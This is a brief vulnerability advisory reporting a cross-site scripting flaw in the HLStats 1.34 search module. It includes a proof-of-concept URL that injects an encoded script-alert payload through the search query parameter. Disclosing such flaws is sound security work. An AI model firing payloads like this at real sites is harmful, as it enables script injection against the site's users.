HLStats version 1.34 suffers from a cross site scripting vulnerability.
a63c979b78eb39b37d1ac30865f8a51828daf62b4e7c17f60122c5610af6fde8
Cross-site Scripting Vulnerability in HLStats 1.34
hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22
Search module fails to sanitize quotes.
kefka
kefka@kevinbeardsucks.com
Thanks to RSnake